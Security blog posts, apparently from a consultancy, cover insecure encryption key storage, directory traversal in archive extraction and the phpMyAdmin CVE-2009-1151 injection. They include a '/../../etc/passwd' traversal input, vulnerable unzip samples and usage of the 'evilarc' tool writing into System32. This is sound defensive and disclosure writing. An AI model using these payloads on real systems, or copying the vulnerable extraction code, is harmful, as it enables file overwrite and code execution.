Now, Where Did I Leave My Keys…

By: Greg Ose

Even with the best intentions, secure storage of sensitive information is a common architectural issue that is typically overlooked by corporations in the development of applications. While you may be using AES with a 256 bit key and can advertise your industry-standard, cutting-edge, crypto-hacker defenses, you still may be exposing you and your customer’s data to significant risk. You need to ask yourself the question: “Where exactly did I leave those keys?”

All too often on pen tests we will obtain significant privileges within a client’s network and while the issues leading to this are completely out of scope for this post, you need to start thinking about what an attacker could compromise once they have free reign of your network. What are your key assets and how are you protecting these? Typically, the answer to the former will include client information, be it PII or credit card related information, and the answer to the later is “we encrypt it.” Unfortunately, “we encrypt it” is usually only completely understood by the handful of developers that wrote the code to do the encryption. They received the requirement specs to do encryption, maybe even detailed enough requirements to specify a well establish crypto algorithm and key size, wrote the code to do that using standard and well regarded libraries, and moved on to the next requirement. But ask yourself, were there any requirements around where the encryption keys should be stored?

During pen tests, once we have established that encrypted information is being stored, the task becomes what algorithm is being used and where are the associated keys? If you know a company is making the effort to encrypt something, it’s probably a decent target to go after. Fortunately for us, and our looming lunch break, there are usually only a handful of places we typically need to look:

    The database or configuration file – Usually by the time we have access to encrypted data, we have full access to the host storing the data or running the application. If we only have to look one directory up for a configuration file or at another table in the database for the encryption key, you might as well have base64 or rot13 encoded the data. By the way, this includes any configuration options you may be storing in the registry or other locations on the host.

    The application source code – In a compromised environment, source code repositories or file shares containing source archives are always an interesting target. We can start to understand your applications better and figure out exactly how encryption or decryption is being done. If your source code contains hard-coded encryption keys, this process can easily be reversed and executed by us in our own program.

    The application binaries / compiled libraries – If your source repository is locked down and access to source is unavailable, compiled application binaries or libraries are always going to be accessible. Even during a short-term pen test, a skilled pentester will be able to throw the mycrypt.dll library into IDA and search for the 32 byte static array you used to store your key. Even more conveniently, a pentester may just be able to import the library and call its decrypt(byte[]) function for instant decryption.

While these may be the worst-case scenario for storing encryption key, they are what we almost always see in use within corporate environments.

So where should these keys be stored? Unfortunately, there is no clear cut answer for this. This is the most difficult problem when providing encryption in your applications; if decryption needs to be done in an automated fashion (which is almost always a requirement) you need to fully trust the application performing the decryption. Seems like common sense, but how can you trust the application if you assume the environment has been compromised? For this problem, the only option you have is to make obtaining the encryption key harder, though not impossible, for an attacker. A best-case implementation of this involves sending your encrypted data to a HSM, hardware security module, to perform the encryption and decryption of the data. However, you still trust your application and environment to authenticate and access the HSM for this functionality. This process can be obfuscated and expanded to include numerous steps, but ultimately you still run into the core trust issue of the environment. This problem is the same that digital media producers and software publishers have been fighting for years by using DRM protection; their code or media being the equivalent to you or user’s sensitive data.

While not perfect, by removing immediate access to encryption keys and delegating this access to a separate host, you can implement more complete security controls around the host managing encryption keys. For example, if the entire Window’s domain is compromised, you can ensure that the host storing keys is not part of this domain and has limited or preferably no access by users. In-house at Neohapsis, we are working on developing an easy to use, open-source, server that can be utilized to provide this out-of-band key management. This will be an extension to existing libraries to provide remote key storage. No promises on when it will be released (sorry, we have to be billable!), but hopefully it will offer developers an easy way to implement better key storage and security within their applications.

Directory Traversal in Archives

By: Greg Ose and Patrick Toomey

I’m sure on the top of everyone’s list of resolutions from the New Year is the ever forgotten “I will write more secure code” and it seems that each year this task gets harder. With more complex and abstracted frameworks and APIs, the ways security related bugs are being introduced to a code base has become equally complex and abstracted. Being a few months into 2009, hopefully we can help you catch up on your resolutions by presenting something else to look for when reviewing or writing secure code.

In recent engagements, we have run into a slew of issues focusing around the well-known vulnerability of directory path traversal. As a refresher, this typically involves injecting file path meta-characters into a filename string to reference arbitrary files and usually results in the modification or disclosure of files on the system. For example, a user supplies the filename /../../etc/passwd which is appended to the path /tmp/uploaded_pictures and ends up referencing the password file instead of a file under the intended directory.

We all know, or at least should know, what a typical directory traversal vulnerability and exploit looks like, however, we have recently seen these issues manifest themselves in the handling of user-provided archive files instead of file path strings. Typically, these user provided files are sent via HTTP uploads. Almost all of the common high-level application APIs provide a means, or a third-party library, to handle archive files. Additionally, almost all of these libraries do not check for potential directory path traversal when they perform the extraction of these files. This puts the liability on the developer to check for malicious archives. While file operation calls with a user controlled variable may be obvious, filenames within user-controlled archives may be the vulnerability that slips by. Developers should not only validate user supplied file paths for directory traversal, but also check file paths included in archive files. As a note, this type of vulnerability has been mentioned before and is not groundbreaking by any means, but we want to take a detailed look into what to be aware of as a developer and how to test for this during vulnerability assessments.

To get started lets take a look at an example provided by Sun themselves (!!!) in a technical article for the java.util.zip package. Code Sample 1 from the article provides their base example for extracting an archive and is shown below.

import java.io.*;
import java.util.zip.*;

public class UnZip {
  final int BUFFER = 2048;
  public static void main (String argv[]) {
    try {
      BufferedOutputStream dest = null;
      FileInputStream fis = new FileInputStream(argv[0]);
      ZipInputStream zis = new ZipInputStream(
                               new BufferedInputStream(fis));
      ZipEntry entry;
      while((entry = zis.getNextEntry()) != null) {
        System.out.println("Extracting: " +entry);
        int count;
        byte data[] = new byte[BUFFER];
        // write the files to the disk
        FileOutputStream fos = new FileOutputStream(
                                   entry.getName());
        dest = new BufferedOutputStream(fos, BUFFER);
        while ((count = zis.read(data, 0, BUFFER)) != -1) {
          dest.write(data, 0, count);
        }
        dest.flush();
        dest.close();
      }
      zis.close();
    } catch(Exception e) {
      e.printStackTrace();
    }
  }
}

We can see where the vulnerability manifests itself in processing each entry of the provided ZIP file:

FileOutputStream fos = new FileOutputStream(entry.getName());

entry is the current ZIP entry being processed and getName() returns the filename stored in that entry. After retrieving this filename, the uncompressed data is written to its value. We can see that by using directory traversal in the filename a malicious user may be able to make arbitrary writes anywhere on the filesystem. Unfortunately, on most platforms, if an attacker can arbitrarily write files they can most likely also get arbitrary code executed on the affected server.

Similar issues exist with a number of ZIP library implementations across various languages. As one might expect, the equivalent Python code is far less verbose. While Python doesn’t provide any sample code, a simple, and vulnerable, ZIP extraction would look as follows:

from zipfile import ZipFile
import sys
zf = ZipFile(sys.argv[1])
zf.extractall()

The extractall method does what one would expect it to do, except that it does not check for directory traversal in the ZIP entries’ file paths. Python also provides equivalent objects for handling tar archives. Interestingly, the tar archive library documentation does make mention of the risk associated with path traversal within archive files. The documentation for the extractall method states:

Warning: Never extract archives from untrusted sources without prior inspection. It is possible that files are created outside of path, e.g. members that have absolute filenames starting with “/” or filenames with two dots “..”.

How about PHP, surely they provide a function to work with ZIP files (what don’t they have a function for). The PHP manual provides the following example code for extracting ZIP files.

<?php
$zip = new ZipArchive;
$res = $zip->open('test.zip');
if ($res === TRUE) {
  echo 'ok';
  $zip->extractTo('test');
  $zip->close();
} else {
  echo 'failed, code:' . $res;
}
?>

Sure enough, this code is also vulnerable to file path manipulation within the archive.

What about everyone’s favorite language du jour, Ruby? Ruby itself does not have ZIP file extraction built in to the language’s core library. However, rubyzip is a popular third-party library and like the prior libraries, is also vulnerable to directory traversal. The example below was stated in a post by the library’s author as how to extract a ZIP file and all of its directories:

require 'rubygems'
require 'zip/zipfilesystem'
require 'fileutils'

OUTDIR="out"

Zip::ZipFile::open("all.zip") {
  |zf|

  zf.each { |e|
    fpath = File.join(OUTDIR, e.name)
    zf.extract(e, fpath)
    FileUtils.mkdir_p(File.dirname(fpath))
  }
}

Finally, similar to Ruby, the .Net environment does not have ZIP archive handling built in to the core library. A quick googling for “.Net zip files” leads to an article on MSDN. In this article, the authors detail this gap in the .Net library and then go on to present a solution. The tools released include a signed DLL for use during development and a set of command-line utility programs that utilize the library. One of these command-line utilities is Unzip.exe. Sure enough, Unzip.exe is vulnerable to path traversal within an archive. No warning is presented and the archive is extracted without concern to the fully resolved path of the files within the archive.

How do mainstream, standalone, compression utility programs handle this vulnerability? We tested a large number of archive extraction programs (Winzip, Winrar, command line Info-Zip, unzip on Unix, etc) and noted that all of them either provide a warning when a ZIP file entry contains directory traversal, escape the meta-characters, or just ignore the traversed directory path all together.

When writing code that interacts with archives, the same precautions used by mainstream extraction utilities must be performed by the developer. As with any user-controlled input, the directory filenames should be validated before being processed by any file operation. The developer should verify that path traversal characters do not occur in any entries within the archive. Similarly, the developer may also leverage utility functions within their language to first determine the fully resolved path before extracting an entry (ex. os.path.normpath(path) in Python).

A more drastic mitigation, though perhaps the better long-term solution, would involve modifying these default libraries to work similarly to their standalone application counterparts by default. It is extremely rare to require path traversal characters in a legitimate archive. Perhaps, the libraries should be modified to secure the common case, requiring a developer to explicitly request the atypical case. For example, what if the Python ZipFile object changed its default behavior to throw an exception in the presence of file traversal characters? The extractall method signature could be modified as follows:

ZipFile.extractall([path[,members[,pwd[,allow_traverse]]]])

By default the allow_traverse is set to False, throwing zipfile.BadZipfile if path traversal characters are encountered. This would provide a secure by default configuration for the library while still allowing the existing behavior if necessary. This requires the developer to explicitly request support for path traversal, thus mitigating accidental and insecure usage. This is unlikely to impact existing code, as archives with path traversal characters are not easy to create and it is extremely unlikely a legitimate archive would accidentally include such characters.

During the course of this write-up we grew tired of hand-editing zip archives in a hex-editor to add directory traversal characters. So, we put together a Python script that can be used to generate ZIP archives with path traversal sequences automatically inserted. It can create directories in both Unix and Windows environments for ZIP files (including jar) and tar files with and without compression (gzip or bzip2). You can specify an arbitrary number of directories to traverse and an additional path to append (think var/www or Windows\System32). The full usage follows:

$ ./evilarc.py --help
Usage: evilarc <input file>

Create archive containing a file with directory traversal

Options:
  --version      show program's version number and exit
  -h, --help     show this help message and exit
  -f OUT, --output-file=OUT
                 File to output archive to.  Archive type is
                 based off of file extension.  Supported
                 extensions are zip, jar, tar, tar.bz2, tar.gz,
                 and tgz.  Defaults to evil.zip.
  -d DEPTH, --depth=DEPTH
                 Number directories to traverse. Defaults to 8.
  -o PLATFORM, --os=PLATFORM
                 OS platform for archive (win|unix). Defaults
                 to win.
  -p PATH, --path=PATH  Path to include in filename after
                 traversal.  Ex:WINDOWS\System32\

The following example shows the file test.txt being added to an archive and extracted to the C:\Windows\System32 directory through the vulnerable Java class we previously discussed:

$ ./evilarc.py test.txt -p Windows\\System32\\
Creating evil.zip containing ..\..\..\..\..\..\..\..\Windows\System32\test.txt

$ java javaunzip evil.zip
Extracting: ..\..\..\..\..\..\..\..\Windows\System32\test.txt

$ ls -al /cygdrive/c/Windows/System32/test.txt
-rwxr-x---+ 1 gose mkgroup-l-d 21 Feb 24 11:52 /cygdrive/c/Windows/System32/test.txt

We have made the script available for download here:

https://github.com/Neohapsis/evilarc

About CVE-2009-1151

During an evaluation of tools for internal use, we took a look at phpMyAdmin. During the assessment, we identified that the scripts/setup.php script is used to generate a configuration file to config/config.inc.php. Anytime PHP code is being generated, extremely careful filtering must be done to ensure that the intended output cannot be escaped and will not allow the injection of arbitrary code.

While the most obvious inputs, those set by the configuration fields, were escaped properly, other attacker accessible data was not. The script passes PHP serialized data back and forth through the configuration parameter. When a save action is performed, this data is then written as PHP variables to the configuration file. The data contains associative arrays with key and value pairs. On output, the values are properly escaped using add_slashes, however the keys that are also output are not filtered. By modifying the array keys in the serialized data passed to a save POST request, the key name can be escaped and arbitrary PHP code injected. If config/ is writable by the web server user, the config.inc.php file is written to it and can be executed directly out of the document root.

The issue was disclosed to the phpMyAdmin team and they did an amazing job responding to this disclosure with a patch out in less than 24 hours!

Lessons learned? Anytime you are programmatically generating code (be it HTML, JavaScript, PHP, etc.) ensure that your output is properly filtered and make sure all installation scripts and unneeded administration tools are removed.

References:
Advisory: http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
Patch: http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revision=12301
CVE: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1151